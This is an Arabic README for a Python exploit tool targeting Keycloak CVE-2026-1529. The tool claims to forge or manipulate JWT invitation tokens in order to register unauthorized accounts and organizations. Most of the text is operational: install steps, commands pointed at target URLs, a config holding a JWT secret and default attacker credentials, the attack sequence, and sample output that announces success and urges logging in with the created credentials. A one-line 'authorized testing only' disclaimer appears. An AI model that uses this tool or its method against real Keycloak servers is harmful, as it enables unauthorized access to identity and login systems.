
Keycloak: تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة
CVE-2026-1529: Keycloak - تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة
⚠️ تحذير: هذه الأداة مخصصة لأغراض الاختبار الأمني التعليمي والمصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
توضح هذه الأداة ثغرة أمنية حرجة في Keycloak (CVE-2026-1529) تسمح بتسجيل مؤسسة غير مصرح به من خلال التحقق غير السليم من رمز دعوة JWT. يقوم الاستغلال بالتلاعب برموز الدعوة للحصول على وصول غير مصرح به إلى مثيلات Keycloak.
تفاصيل الثغرة:
# استنساخ المستودع
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit
# إنشاء بيئة افتراضية
python3 -m venv venv
source venv/bin/activate # على Windows: venv\Scripts\activate
# تثبيت التبعيات
pip install -r requirements.txt
# إنشاء هيكل الدليل
mkdir -p keycloak-exploit/{utils,config,logs,output/reports}
cd keycloak-exploit
# تنزيل الملفات من الإصدارات أو نسخها يدويًا
# ثم تثبيت التبعيات
pip install requests urllib3 PyJWT
keycloak-exploit/
├── keycloak-exploit.py # سكربت الاستغلال الرئيسي
├── requirements.txt # تبعيات Python
├── README.md # هذا الملف
├── config/
│ └── default_config.json # ملف الإعدادات
├── utils/
│ ├── __init__.py # مُهيئ الحزمة
│ ├── http_utils.py # أدوات عميل HTTP
│ ├── jwt_utils.py # التلاعب بـ JWT
│ └── crypto_utils.py # أدوات التشفير
├── logs/ # سجلات مولدة تلقائيًا
└── output/
└── reports/ # تقارير الاستغلال
python3 keycloak-exploit.py https://target-keycloak.com
# مع رمز دعوة مخصص
python3 keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target.com
# مع معرف مؤسسة مخصص
python3 keycloak-exploit.py -o custom_org_id https://target.com
# مع ملف إعدادات مخصص
python3 keycloak-exploit.py -c /path/to/config.json https://target.com
# تفعيل تسجيل التصحيح
python3 keycloak-exploit.py -d https://target.com
# عرض المساعدة
python3 keycloak-exploit.py -h
# عرض الإصدار
python3 keycloak-exploit.py -v
| الوسيط | الاختصار | الوصف |
|---|---|---|
target | - | عنوان URL المستهدف لـ Keycloak (مطلوب) |
--token | -t | رمز دعوة مخصص |
--org-id | -o | معرف مؤسسة مخصص |
--config | -c | مسار ملف الإعدادات |
--debug | -d | تفعيل تسجيل التصحيح |
--version | -v | عرض معلومات الإصدار |
--help | -h | عرض رسالة المساعدة |
قم بتحرير config/default_config.json لتخصيص معلمات الاستغلال:
{
"exploit": {
"default_username": "admin_user_2026",
"default_password": "KeycloakCVE2026!",
"default_email": "[email protected]",
"timeout": 30,
"max_retries": 3
},
"jwt": {
"algorithm": "HS256",
"secret_key": "keycloak-cve-2026-1529-exploit",
"token_expiry": 3600
},
"target": {
"endpoints": {
"realms": "/realms",
"organizations": "/organizations",
"register": "/register",
"login": "/login"
}
},
"output": {
"log_level": "INFO",
"save_reports": true,
"report_format": "txt"
}
}
| القسم | المعلمة | الوصف | الافتراضي |
|---|---|---|---|
exploit | default_username | اسم المستخدم للتسجيل | admin_user_2026 |
exploit | default_password | كلمة المرور للتسجيل | KeycloakCVE2026! |
exploit | default_email | البريد الإلكتروني للتسجيل | [email protected] |
exploit | timeout | مهلة طلب HTTP (بالثواني) | 30 |
exploit | max_retries | الحد الأقصى لمحاولات HTTP | 3 |
jwt | algorithm | خوارزمية توقيع JWT | HS256 |
jwt | secret_key | المفتاح السري لـ JWT | مخصص |
jwt | token_expiry | انتهاء صلاحية الرمز (بالثواني) | 3600 |
يعمل الاستغلال بالخطوات التالية:
فحص الثغرة
توليد/التلاعب بالرمز
تسجيل المستخدم
التحقق من تسجيل الدخول
توليد التقرير
output/reports/┌─────────────────┐
│ فحص الهدف │
└────────┬────────┘
│
▼
┌─────────────────┐
│ توليد/الحصول │
│ على الرمز │
└────────┬────────┘
│
▼
┌─────────────────┐
│ التلاعب بالرمز │
└────────┬────────┘
│
▼
┌─────────────────┐
│ تسجيل المستخدم │
└────────┬────────┘
│
▼
┌─────────────────┐
│ اختبار الدخول │
└────────┬────────┘
│
▼
┌─────────────────┐
│ توليد التقرير │
└─────────────────┘
============================================================
نتائج استغلال CVE-2026-1529
============================================================
✓ الهدف عرضة لثغرة CVE-2026-1529
🎯 الاستغلال ناجح!
اسم المستخدم: admin_user_2026
كلمة المرور: KeycloakCVE2026!
البريد الإلكتروني: [email protected]
رابط تسجيل الدخول: https://target.com/realms/master/account
📄 تم حفظ التقرير في: output/reports/exploit_report_20260211_050507.txt
🔐 استخدم بيانات الاعتماد المقدمة للوصول إلى مثيل Keycloak!
⚠️ هذا يوضح الوصول غير المصرح به بسبب CVE-2026-1529
============================================================
بواسطة f3ds cr3w est, 2002
============================================================
يتم حفظ تقرير مفصل في output/reports/ يتضمن:
يتم حفظ السجلات في دليل logs/ مع معلومات تنفيذ مفصلة.
الحل:
# تأكد من أنك في الدليل الصحيح
cd keycloak-exploit
python3 keycloak-exploit.py https://target.com
الحل:
# تأكد من وجود دليل config
mkdir -p config
# انسخ أو أنشئ default_config.json في config/